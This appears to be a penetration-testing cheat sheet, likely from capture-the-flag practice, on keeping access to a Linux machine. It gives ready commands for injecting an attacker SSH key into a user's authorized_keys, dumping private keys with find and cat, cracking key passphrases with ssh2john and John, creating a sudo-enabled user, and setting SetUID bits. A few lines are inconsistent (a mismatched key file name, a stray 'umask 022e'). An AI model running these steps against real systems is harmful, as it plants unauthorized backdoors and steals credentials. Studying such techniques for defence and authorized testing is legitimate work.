Persistence

SSHKey Injection

Generate SSH Keys

ssh-keygen -t ed25519 -f key

To make sure the execute properly give it restricted permissions:

chmod 600 id_rsa

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys

Now just connect with your private key:

ssh -i key dvir@10.10.11.8

Using Existing keys

Look for the private key

find /home/user -name "id_*" -exec cat {} \;

Once you find it, just copy the key in your .ssh directory and ssh in.
Also you can, check If the Corresponding private/public Key is known by using this repo.

Crack the passphrase

ssh2john private_key > private_key.hash

john private_key.hash --wordlist=/path/to/wordlist

Clone the key

openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer

Account Manipulation

Edit sudoers file

sudo visudo

Creates a new user

sudo useradd newuser

Add user to the sudo group

sudo usermod -aG sudo newuser

Set or change password

sudo passwd newuser

Access Control Lists

Show the ACL

getfacl file.txt

Grant read/write permissions to 'user' on file.txt

setfacl -m u:user:rw file.txt

File Manipulation

Sets the SetUID bit

chmod u+s <file>

Octal Numbers (4 = Read, 2 = Write, 1 = Execute)

sudo chmod 755 file.txt

Change file owner and group

sudo chown user:group file.txt

umask Manipulation

World read/write/execute

umask 000

Group-writable

umask 002

World-readable

umask 022e

Last updated 10 days ago